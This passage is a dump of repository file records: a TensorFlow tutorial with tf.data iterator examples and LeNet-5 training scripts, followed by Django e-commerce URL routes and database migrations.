tf.errors.OutOfRangeError:\n pass\n\n print('Epoch {}'.format(str(epoch + 1)))\n print(\"---------------------------\")\n print('Training accuracy is {}'.format(total_train_accuracy / no_train_examples))\n print('Validation accuracy is {}'.format(total_val_accuracy / no_val_examples))\n\n print(\"Testing the model --------\")\n\n total_test_accuracy = 0\n no_test_examples = len(y_test)\n try:\n while True:\n temp_test_accuracy = sess.run(accuracy, feed_dict={handle: test_string_handle})\n total_test_accuracy += temp_test_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Testing accuracy is {}'.format(total_test_accuracy / no_test_examples))"
},
{
"alpha_fraction": 0.5787546038627625,
"alphanum_fraction": 0.6007326245307922,
"avg_line_length": 23.81818199157715,
"blob_id": "2af109c0f53a03f91dcd5ae3dd23d063bc496e90",
"content_id": "253930a943e56b15c0d572fc424a0ac2e28e615a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 273,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 11,
"path": "/add.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n\nx = tf.constant([3, 4, 5], name = 'x')\ny = tf.constant([1, 2, 3], name = 'y')\n\nz = tf.add(x, y, name='z')\n\nwith tf.Session() as sess:\n with tf.summary.FileWriter('summaries', sess.graph) as writer:\n numpy_z = sess.run([z])\nprint(numpy_z)\n"
},
{
"alpha_fraction": 0.49902305006980896,
"alphanum_fraction": 0.5288198590278625,
"avg_line_length": 30.687307357788086,
"blob_id": "7b5eb3488349e50c7741423e37f69b7bad6ceb85",
"content_id": "d05837dbe816dcf37b5d56fdaf34dc60d3fbc019",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10236,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 323,
"path": "/dataset_tutorials.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "\nimport tensorflow as tf\nimport numpy as np\n\ndef Print(next_ele):\n with tf.Session() as sess:\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n\n###############################################################################\n'''Batches: Combines consecutive elements of the Dataset into a single batch.\nUseful when you want to train smaller batches of data to avoid out of memory \nerrors.'''\n###############################################################################\n\ndef Batches():\n data = np.arange(10, 40)\n\n # create batches of 10\n dataset = tf.data.Dataset.from_tensor_slices(data).batch(10)\n\n # creat the iterator to consume the data\n iterator = dataset.make_one_shot_iterator()\n next_ele = iterator.get_next()\n return next_ele\n\n'''\nThe output is :\n\n[10 11 12 13 14 15 16 17 18 19] \n[20 21 22 23 24 25 26 27 28 29] \n[30 31 32 33 34 35 36 37 38 39]\n'''\n\n\n###############################################################################\n'''Zip: Creates a Dataset by zipping together datasets. Useful in scenarios\nwhere you have features and labels and you need to provide the pair of feature\nand label for training the model.'''\n###############################################################################\n\ndef Zip():\n data_x = np.arange(10, 40)\n data_y = np.arange(11, 41)\n\n dataset_x = tf.data.Dataset.from_tensor_slices(data_x)\n dataset_y = tf.data.Dataset.from_tensor_slices(data_y)\n\n dcombined = tf.data.Dataset.zip((dataset_x, dataset_y)).batch(5)\n\n iterator = dcombined.make_one_shot_iterator()\n return iterator.get_next()\n\n'''\nThe output is\n\n(array([10, 11]), array([11, 12])) \n(array([12, 13]), array([13, 14])) \n(array([14, 15]), array([15, 16])) \n(array([16, 17]), array([17, 18])) \n(array([18, 19]), array([19, 20]))\n'''\n\n\n###############################################################################\n'''Repeat: Used to repeat the Dataset.'''\n###############################################################################\n\ndef Repeat():\n dataset = tf.data.Dataset.from_tensor_slices(tf.range(10))\n dataset = dataset.repeat(count = 2)\n iterator = dataset.make_one_shot_iterator()\n next_ele = iterator.get_next()\n return next_ele\n\n'''The Output is \n\n0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9\n'''\n\n\n###############################################################################\n'''Map: Used to transform the elements of the Dataset. 
Useful in cases where\nyou want to transform your raw data before feeding into the model.'''\n###############################################################################\n\ndef map_fnc(x):\n return x*2\n \n\ndef Map():\n data = np.arange(10)\n dataset = tf.data.Dataset.from_tensor_slices(data)\n dataset = dataset.map(map_fnc)\n\n iterator = dataset.make_one_shot_iterator()\n next_ele = iterator.get_next()\n return next_ele\n\n'''\nThe output is\n\n0 2 4 6 8 10 12 14 16 18\n'''\n\n###############################################################################\n############# print the output of all the function ############################\n###############################################################################\n\n#Print(Batches())\n#Print(Zip())\n#Print(Repeat())\n#Print(Map())\n\n\n\n###############################################################################\n############## Iterators #####################################################\n###############################################################################\n\ndef Print_One_Ite(next_element):\n with tf.Session() as sess:\n val = sess.run(next_element)\n print(val)\n\n\n###############################################################################\n'''One-shot iterator: This is the most basic form of iterator. It requires\nno explicit initialization and iterates over the data only one time and once\nit gets exhausted, it cannot be re-initialized.'''\n###############################################################################\n\ndef One_Shot_iterator():\n data = np.arange(10, 50)\n #create the dataset\n dataset = tf.data.Dataset.from_tensor_slices(data)\n\n #Create the iterator\n iterator = dataset.make_one_shot_iterator()\n next_element = iterator.get_next()\n return next_element\n\n# Print_One_Ite(One_Shot_iterator())\n\n\n###############################################################################\n'''Initializable iterator: This iterator requires you to explicitly initialize \nthe iterator by running iterator.initialize. You can define a tf.placeholder \nand pass data to it dynamically each time you call the initialize \noperation.'''\n###############################################################################\n\ndef Initializable_iterator(min_val = 10, max_val = 40, batch_size = 3):\n # Define two placeholders to accept min and max values\n _min_val = tf.placeholder(tf.int32, shape=[], name = 'min_val')\n _max_val = tf.placeholder(tf.int32, shape=[], name = 'max_val')\n _batch_size = tf.placeholder(tf.int64, shape=[], name = 'batch_size')\n\n data = tf.range(_min_val, _max_val)\n\n dataset = tf.data.Dataset.from_tensor_slices(data).batch(_batch_size)\n\n iterator = dataset.make_initializable_iterator()\n next_ele = iterator.get_next()\n with tf.Session() as sess:\n\n # Initialize an iterator with range of values from 10 to 16\n sess.run(\n iterator.initializer,\n feed_dict = {\n _min_val: min_val,\n _max_val: max_val,\n _batch_size: batch_size\n }\n )\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n'''\nThe output is\n\n[10 11 12]\n[13 14 15]\n[16 17 18]\n[19 20 21]\n[22 23 24]\n[25 26 27]\n[28 29 30]\n[31 32 33]\n[34 35 36]\n[37 38 39]\n'''\n\n\n###############################################################################\n'''Reinitializable iterator: This iterator can be initialized from different\nDataset objects that have the same structure. 
Each dataset can pass through \nits own transformation pipeline.'''\n###############################################################################\n\ndef map_fnc(ele):\n return ele*2\n\ndef Reinitializable_Iterator(\n min_val_train = 10, \n max_val_train = 18, \n min_val_validation = 1, \n max_val_validation = 10, \n batch_size = 3\n ):\n min_val_ = tf.placeholder(tf.int32, shape = [], name = 'min_val')\n max_val_ = tf.placeholder(tf.int32, shape = [], name = 'max_val')\n batch_size_ = tf.placeholder(tf.int64, shape = [], name = 'batch_size')\n\n data = tf.range(min_val_, max_val_)\n\n # Define separate datasets for training and validation\n train_dataset = tf.data.Dataset.from_tensor_slices(data).batch(batch_size_)\n val_dataset = tf.data.Dataset.from_tensor_slices(data).map(map_fnc).batch(batch_size_)\n\n # Create an iterator\n iterator = tf.data.Iterator.from_structure(\n train_dataset.output_types,\n train_dataset.output_shapes\n )\n\n train_initializer = iterator.make_initializer(train_dataset)\n val_initializer = iterator.make_initializer(val_dataset)\n\n next_ele = iterator.get_next()\n with tf.Session() as sess:\n print('Train Dataset:')\n # initialize an iterator with range of values from 10 to 16\n sess.run(train_initializer, feed_dict={\n min_val_:min_val_train,\n max_val_:max_val_train,\n batch_size_:batch_size\n })\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n\n print(\"Validation Dataset:\")\n # Initialize an iterator with range of values from 1 to 10\n sess.run(val_initializer, feed_dict={\n min_val_:min_val_validation,\n max_val_:max_val_validation,\n batch_size_:batch_size\n })\n try:\n while True:\n val = sess.run(next_ele)\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n'''\nThe Output is:\nTrain Dataset:\n[10 11 12]\n[13 14 15]\n[16 17]\nValidation Dataset:\n[2 4 6]\n[ 8 10 12]\n[14 16 18]\n'''\n\n\n###############################################################################\n'''Feedable iterator: Can be used to switch between Iterators for different\nDatasets. 
Useful when you have different Datasets and you want to have more \ncontrol over which iterator to use over the Dataset.'''\n###############################################################################\n\ndef map_fnc(x):\n return x*2\n\n\ndef Feedable_Iterator():\n min_val_ = tf.placeholder(tf.int32, shape = [])\n max_val_ = tf.placeholder(tf.int32, shape = [])\n batch_size_ = tf.placeholder(tf.int64, shape = [])\n\n data = tf.range(min_val_, max_val_)\n train_dataset = tf.data.Dataset.from_tensor_slices(data).batch(batch_size_)\n val_dataset = tf.data.Dataset.from_tensor_slices(data).map(map_fnc).batch(batch_size_)\n\n train_val_iterator = tf.data.Iterator.from_structure(train_dataset.output_types , train_dataset.output_shapes)\n train_initializer = train_val_iterator.make_initializer(train_dataset)\n val_initializer = train_val_iterator.make_initializer(val_dataset)\n\n test_dataset = tf.data.Dataset.from_tensor_slices(tf.range(10, 15))\n test_iterator = test_dataset.make_one_shot_iterator()\n\n handle = tf.placeholder(tf.string, shape = [])\n iterator = tf.data.Iterator.from_string_handle(handle, train_dataset.output_types, train_dataset.output_shapes)\n next_ele = iterator.get_next()\n\n with tf.Session() as sess:\n train_val_handle = sess.run(train_val_iterator.string_handle())\n test_handle = sess.run(test_iterator.string_handle())\n\n # training\n sess.run(train_initializer, feed_dict={min_val_:10, max_val_:18, batch_size_:3})\n try:\n while True:\n val = sess.run(next_ele, feed_dict={handle:train_val_handle})\n print(val)\n except tf.errors.OutOfRangeError:\n pass\n\n\n\nFeedable_Iterator()\n"
},
{
"alpha_fraction": 0.6464646458625793,
"alphanum_fraction": 0.6767676472663879,
"avg_line_length": 18.799999237060547,
"blob_id": "6fcfd15395cb90b5e315fd43c6c8170219b6b550",
"content_id": "0f6386175c32983d924798dd946203955a68341e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 198,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 10,
"path": "/add_eager.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "import tensorflow as tf\n# import tf.eager\nfrom tensorflow.contrib.eager.python import tfe\n\ntfe.enable_eager_execution()\n\nx = tf.constant([3, 4, 5])\ny = tf.constant([1, 2, 3])\n\nprint(\"X - Y: \", x-y)\n"
},
{
"alpha_fraction": 0.7286876440048218,
"alphanum_fraction": 0.7301025986671448,
"avg_line_length": 61.82222366333008,
"blob_id": "a9305fe66e72123c55f1066643a439f17ab805cc",
"content_id": "204e2c551d43ba049bb48d4b99df16357d1f18ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2831,
"license_type": "no_license",
"max_line_length": 366,
"num_lines": 45,
"path": "/LeNet-5/main.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: main.py\n\nimport tensorflow as tf\nimport numpy as np\nimport argparse\nfrom One_shot_iterator import One_Shot_iterator\nfrom Initializable_iterator import initializable_iterator\nfrom ReInitializable_iterator import ReInitializable_iterator\nfrom Feedable_iterator import Feedable_iterator\nfrom download_data import train_data, val_data, test_data\n\nparser = argparse.ArgumentParser(description='Training the LeNet-5 model with the variours data pipeline method (Iterator) in the tensorflow')\nparser.add_argument(\"-osi\", \"--one_shot_iterator\", help=\"One-shot iterator: The Dataset can’t be reinitialized once exhausted. To train for more epochs, you would need to repeat the Dataset before feeding to the iterator. This will require huge memory if the size of the data is large. It also doesn’t provide any option to validate the model.\", action='store_true')\nparser.add_argument(\"-ii\", \"--initializable_iterator\", help=\"Initializable iterator: You can dynamically change the Dataset between training and validation Datasets. However, in this case both the Datasets needs to go through the same transformation pipeline.\",\n action='store_true')\nparser.add_argument(\"-ri\", \"--reinitializable_iterator\", help=\"Re-initializable iterator: This iterator overcomes the problem of initializable iterator by using two separate Datasets. Each dataset can go through its own preprocessing pipeline. The iterator can be created using the tf.Iterator.from_structure method.\", action='store_true')\nparser.add_argument(\"-fi\", \"--feedable_iterator\", help=\"Feedable iterator: This iterator provides the option of switching between various iterators. You can create a re-initializable iterator for training and validation purposes. For inference/testing where you require one pass of the dataset, you can use the one shot iterator.\", action='store_true')\nargs = parser.parse_args()\n\ndef main():\n print(\"LeNet-5 model runs with various Iterators that TensorFlow provides\")\n\n if args.one_shot_iterator:\n X_train, Y_train = train_data()\n One_Shot_iterator(X_train, Y_train)\n elif args.initializable_iterator:\n X_train, Y_train = train_data()\n X_val, Y_val = val_data()\n initializable_iterator(X_train, Y_train, X_val, Y_val)\n elif args.reinitializable_iterator:\n X_train, Y_train = train_data()\n X_val, Y_val = val_data()\n ReInitializable_iterator(X_train, Y_train, X_val, Y_val)\n elif args.feedable_iterator:\n X_train, Y_train = train_data()\n X_val, Y_val = val_data()\n X_test, Y_test = test_data()\n Feedable_iterator(X_train, Y_train, X_val, Y_val, X_test, Y_test)\n else:\n print(\"Please give some argparse. For more try:\\n python3 main.py -h or --help\")\n\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.6028985381126404,
"alphanum_fraction": 0.6623188257217407,
"avg_line_length": 40.818180084228516,
"blob_id": "8bd2c1e2883338e77cf19089ba7144646e300b99",
"content_id": "f6a4fe913b712260bc9e38eb7ce3dde148d342d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 33,
"path": "/LeNet-5/model.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n\nimport tensorflow as tf\n\n# Let’s define the forward propagation of the model.\ndef forward_pass(X):\n W1 = tf.get_variable(\"W1\", [5,5,1,6], initializer = tf.contrib.layers.xavier_initializer(seed=0))\n # for conv layer2\n W2 = tf.get_variable(\"W2\", [5,5,6,16], initializer = tf.contrib.layers.xavier_initializer(seed=0))\n Z1 = tf.nn.conv2d(X, W1, strides = [1,1,1,1], padding='VALID')\n A1 = tf.nn.relu(Z1)\n P1 = tf.nn.max_pool(A1, ksize = [1,2,2,1], strides = [1,2,2,1], padding='VALID')\n Z2 = tf.nn.conv2d(P1, W2, strides = [1,1,1,1], padding='VALID')\n A2= tf.nn.relu(Z2)\n P2= tf.nn.max_pool(A2, ksize = [1,2,2,1], strides=[1,2,2,1], padding='VALID')\n P2 = tf.contrib.layers.flatten(P2)\n \n Z3 = tf.contrib.layers.fully_connected(P2, 120)\n Z4 = tf.contrib.layers.fully_connected(Z3, 84)\n Z5 = tf.contrib.layers.fully_connected(Z4,10, activation_fn= None)\n return Z5\n\n\n# Let’s define the model operations\ndef model(X,Y):\n logits = forward_pass(X)\n cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits_v2(logits=logits, labels=Y))\n optimizer = tf.train.AdamOptimizer(learning_rate=0.0009)\n learner = optimizer.minimize(cost)\n correct_predictions = tf.equal(tf.argmax(logits,1), tf.argmax(Y,1))\n accuracy = tf.reduce_mean(tf.cast(correct_predictions, tf.float32))\n\n return (learner, accuracy)\n"
},
{
"alpha_fraction": 0.6614654064178467,
"alphanum_fraction": 0.6655359268188477,
"avg_line_length": 37.73684310913086,
"blob_id": "29f799571d67c48874d0be7d700828f7a480c3ee",
"content_id": "11b6378b627e6b6b67e39cb3387d7d2244816e0d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1478,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 38,
"path": "/LeNet-5/One_shot_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: One-shot-iterator.py\n\nimport tensorflow as tf\nfrom model import model\n\n# One-shot-iterator\n'''The Dataset can’t be reinitialized once exhausted. \nTo train for more epochs, you would need to repeat the Dataset before feeding \nto the iterator. This will require huge memory if the size of the data is \nlarge. It also doesn’t provide any option to validate the model.'''\ndef One_Shot_iterator(X_train, Y_train):\n print(\"One Shot Iterator\")\n epochs = 10\n batch_size = 64\n iterations = len(Y_train) * epochs\n tf.reset_default_graph()\n dataset = tf.data.Dataset.from_tensor_slices((X_train, Y_train))\n # need to repeat the dataset for epoch number of times, as all the data needs\n # to be fed to the dataset at once\n dataset = dataset.repeat(epochs).batch(batch_size)\n iterator = dataset.make_one_shot_iterator()\n X_batch, Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n total_accuracy = 0\n try:\n while True:\n temp_accuracy, _ = sess.run([accuracy, learner])\n total_accuracy += temp_accuracy\n print('Training accuracy is {}'.format((total_accuracy * batch_size) / iterations))\n\n except tf.errors.OutOfRangeError:\n pass\n\n print('Avg training accuracy is {}'.format((total_accuracy * batch_size) / iterations))\n\n\n"
},
{
"alpha_fraction": 0.5915157198905945,
"alphanum_fraction": 0.6005719900131226,
"avg_line_length": 40.156864166259766,
"blob_id": "bc46c86aa9564dc44a1a703ce446035c5442a1db",
"content_id": "95813f91d88a3f85de8ca759c97f056e327c7c42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2098,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 51,
"path": "/LeNet-5/Initializable_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: initializable_iterator.py\n\nimport tensorflow as tf\nfrom model import model\n\n# Initializable iterator\n'''You can dynamically change the Dataset between training and validation \nDatasets. However, in this case both the Datasets needs to go through the \nsame transformation pipeline.'''\ndef initializable_iterator(X_train, y_train, X_val, y_val):\n epochs = 10\n batch_size = 64\n tf.reset_default_graph()\n X_data = tf.placeholder(tf.float32, [None, 32,32,1])\n Y_data = tf.placeholder(tf.float32, [None, 10])\n dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data))\n dataset = dataset.batch(batch_size)\n iterator = dataset.make_initializable_iterator()\n X_batch , Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n\n # train the model\n sess.run(iterator.initializer, feed_dict={X_data:X_train, Y_data:y_train})\n total_train_accuracy = 0\n no_train_examples = len(y_train)\n try:\n while True:\n temp_train_accuracy, _ = sess.run([accuracy, learner])\n total_train_accuracy += temp_train_accuracy*batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n # validate the model\n sess.run(iterator.initializer, feed_dict={X_data:X_val, Y_data:y_val})\n total_val_accuracy = 0\n no_val_examples = len(y_val)\n try:\n while True:\n temp_val_accuracy = sess.run(accuracy)\n total_val_accuracy += temp_val_accuracy*batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Epoch {}'.format(str(epoch+1)))\n print(\"---------------------------\")\n print('Training accuracy is {}'.format(total_train_accuracy/no_train_examples))\n print('Validation accuracy is {}'.format(total_val_accuracy/no_val_examples))"
},
{
"alpha_fraction": 0.7717908024787903,
"alphanum_fraction": 0.7733755707740784,
"avg_line_length": 38.4375,
"blob_id": "53aca8ac2f4f63f5a5f29ef7ebdbdc7a4d4bcbc8",
"content_id": "2458c4186d087be4eaa8027ed5aec0de9eab851f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 631,
"license_type": "no_license",
"max_line_length": 200,
"num_lines": 16,
"path": "/README.md",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# Tensorflow-Tutorial\nThe Porpose of creating this repository is to learn tensorflow with the help of some small programs.\n\n### Addition:\nThis program teach how to adding two matrix in the tensorflow.\n\n### Using Eager:\nIn this program we running the tensorflow program without using the session. This will running the code line by line as in the simple python code(interpreter).\n\n### GUP usage:\nIn this program, running the tenorflow program only by the GPU processing and this also check that weather the tensorflow is running on gpu or not `OR` tensorflow-gpu(GPU version) is installed or not.\n\n### tf.data.Dataset\n\n\n### LeNet-5\n"
},
{
"alpha_fraction": 0.6103000640869141,
"alphanum_fraction": 0.6180048584938049,
"avg_line_length": 41.517242431640625,
"blob_id": "b051a566f48a17dc493b0f79e298551352e8753d",
"content_id": "21816457d64dfc4897d87d6f142ae255623927d8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2466,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 58,
"path": "/LeNet-5/ReInitializable_iterator.py",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# LeNet-5 Model\n# filename: Re-initializable_iterator.py\n\nimport tensorflow as tf\nfrom model import model\n\n# Re-initializable iterator\n'''This iterator overcomes the problem of initializable iterator by using two \nseparate Datasets. Each dataset can go through its own preprocessing pipeline.\nThe iterator can be created using the tf.Iterator.from_structure method.'''\n\n\ndef map_fnc(X, Y):\n return X, Y\n\ndef ReInitializable_iterator(X_train, y_train, X_val, y_val):\n epochs = 10\n batch_size = 64\n tf.reset_default_graph()\n X_data = tf.placeholder(tf.float32, [None, 32, 32, 1])\n Y_data = tf.placeholder(tf.float32, [None, 10])\n train_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size).map(map_fnc)\n val_dataset = tf.data.Dataset.from_tensor_slices((X_data, Y_data)).batch(batch_size)\n iterator = tf.data.Iterator.from_structure(train_dataset.output_types, train_dataset.output_shapes)\n X_batch, Y_batch = iterator.get_next()\n (learner, accuracy) = model(X_batch, Y_batch)\n train_initializer = iterator.make_initializer(train_dataset)\n val_initializer = iterator.make_initializer(val_dataset)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for epoch in range(epochs):\n\n # train the model\n sess.run(train_initializer, feed_dict={X_data: X_train, Y_data: y_train})\n total_train_accuracy = 0\n no_train_examples = len(y_train)\n try:\n while True:\n temp_train_accuracy, _ = sess.run([accuracy, learner])\n total_train_accuracy += temp_train_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n # validate the model\n sess.run(val_initializer, feed_dict={X_data: X_val, Y_data: y_val})\n total_val_accuracy = 0\n no_val_examples = len(y_val)\n try:\n while True:\n temp_val_accuracy = sess.run(accuracy)\n total_val_accuracy += temp_val_accuracy * batch_size\n except tf.errors.OutOfRangeError:\n pass\n\n print('Epoch {}'.format(str(epoch + 1)))\n print(\"---------------------------\")\n print('Training accuracy is {}'.format(total_train_accuracy / no_train_examples))\n print('Validation accuracy is {}'.format(total_val_accuracy / no_val_examples))\n"
},
{
"alpha_fraction": 0.787642776966095,
"alphanum_fraction": 0.795950174331665,
"avg_line_length": 79.25,
"blob_id": "7a485d350ae9ca369917d7d30836967c03a323de",
"content_id": "f25f46be6defd041a46ce88f472c8f59c18672aa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1930,
"license_type": "no_license",
"max_line_length": 290,
"num_lines": 24,
"path": "/LeNet-5/README.md",
"repo_name": "himvish997/tensorflow-tutorial",
"src_encoding": "UTF-8",
"text": "# Tensorflow Pipline Tutorial on LeNet-5 model\nIn this tutorial we learn various data pipeline used in the train a model in the tensorflow. there are various method to create the data pipeline in tensorflow by using the `tf.data.Datasets` called iterator. We perform these iterator in the LeNet-5 model of handwritten digit recognitions.\n\n### One shot iterator:\nThe Dataset can’t be reinitialized once exhausted. To train for more epochs, you would need to repeat the Dataset before feeding to the iterator. This will require huge memory if the size of the data is large. It also doesn’t provide any option to validate the model.<br />\nTo run:\n`python3 main.py --one_shot_iterator`\n\n### Initializable iterator: \nYou can dynamically change the Dataset between training and validation Datasets. However, in this case both the Datasets needs to go through the same transformation pipeline.<br />\nTo run: `python3 main.py --initializable_iterator`\n\n### Re-initializable iterator:\nThis iterator overcomes the problem of initializable iterator by using two separate Datasets. Each dataset can go through its own preprocessing pipeline. The iterator can be created using the `tf.Iterator.from_structure` method.<br>\nTo run: `python3 main.py --reinitializable_iterator`\n\n### Feedable iterator:\nThis iterator provides the option of switching between various iterators. You can create a re-initializable iterator for training and validation purposes. For inference/testing where you require one pass of the dataset, you can use the one shot iterator.<br>\nTo run: `python3 main.py --feedable_iterator`\n\n#### Reference\n1. Blog: https://towardsdatascience.com/building-efficient-data-pipelines-using-tensorflow-8f647f03b4ce <br>\n2. Original Source Code: https://github.com/animesh-agarwal/Datasets-and-Iterators/blob/master/DataSet_and_Iterators.ipynb <br>\n3. https://www.tensorflow.org/api_docs/python/tf/data/Iterator#from_string_handle\n"
}
] | 12 |
Mahedihasan8855/E-com-using-Python-Django- | https://github.com/Mahedihasan8855/E-com-using-Python-Django- | a31325b4d603a52fecac8ea3ac4cb3ecfe5ccbbf | 592ac2a3ed8d09e0d7ebf4673f89b5da486436e7 | 35f77b5197376b23dcc074562848bdb4d27865b4 | refs/heads/master | 2023-04-13T10:02:24.021373 | 2021-04-03T11:08:41 | 2021-04-03T11:08:41 | 327,215,569 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6740506291389465,
"alphanum_fraction": 0.6740506291389465,
"avg_line_length": 44.14285659790039,
"blob_id": "a5ca8bb1c3087bf7f9f5072c71fe493d40c49e7e",
"content_id": "23cb4d5d0ef11805bbb68e27e8a408bde4b0d030",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 948,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 21,
"path": "/mahedi/shop/urls.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path(\"\", views.index, name=\"ShopHome\"),\n path(\"about/\", views.about, name=\"AboutUs\"),\n path(\"contact/\", views.contact, name=\"ContactUs\"),\n path(\"tracker/\", views.tracker, name=\"TrackingStatus\"),\n path(\"search/\", views.search, name=\"Search\"),\n path(\"products/<int:myid>\", views.productView, name=\"ProductView\"),\n path(\"checkout/\", views.checkout, name=\"Checkout\"),\n path('logout/',views.user_logout,name='user_logout'),\n path('login/',views.user_login,name='user_login'),\n path('register/',views.user_register,name='user_register'),\n path('profile/',views.user_profile,name='user_profile'),\n path('user_update/',views.user_update,name='user_update'),\n path('user_password/',views.user_password,name='user_password'),\n path(\"handlerequest/\", views.handlerequest, name=\"HandleRequest\"),\n path(\"paytm/\", views.paytm, name=\"HandleRequest\"),\n]\n"
},
{
"alpha_fraction": 0.46617162227630615,
"alphanum_fraction": 0.5024752616882324,
"avg_line_length": 24.25,
"blob_id": "bf81886ee02a1ffd52403530b78c81e23a04d483",
"content_id": "bee70e1535d080793a0fa8198db909e85d46b6f5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1212,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 48,
"path": "/mahedi/blog/migrations/0003_auto_20201216_1204.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2020-12-16 06:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blog', '0002_auto_20200707_2226'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='blogpost',\n old_name='head0',\n new_name='author',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='chead0',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='chead1',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='chead2',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='head1',\n ),\n migrations.RemoveField(\n model_name='blogpost',\n name='head2',\n ),\n migrations.AddField(\n model_name='blogpost',\n name='blog',\n field=models.CharField(default='', max_length=9000),\n ),\n migrations.AlterField(\n model_name='blogpost',\n name='title',\n field=models.CharField(max_length=200),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5398457646369934,
"alphanum_fraction": 0.5604113340377808,
"avg_line_length": 29.710525512695312,
"blob_id": "1a08120f2fafd26f7b6544445f7c91bee2c75c74",
"content_id": "1ba4ed49cad4be47fe8eab1c5c8e9172ef04c4de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1167,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 38,
"path": "/mahedi/shop/migrations/0010_auto_20201215_1247.py",
"repo_name": "Mahedihasan8855/E-com-using-Python-Django-",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.4 on 2020-12-15 06:47\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0009_projectsetting_title_icon'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='projectsetting',\n name='team1',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team2',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team3',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team4',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n migrations.AddField(\n model_name='projectsetting',\n name='team5',\n field=models.ImageField(blank=True, null=True, upload_to='icon/'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.3894711136817932,
"alphanum_fraction": 0.4094564914703369,
"avg_line_length": 28.7391300201416,
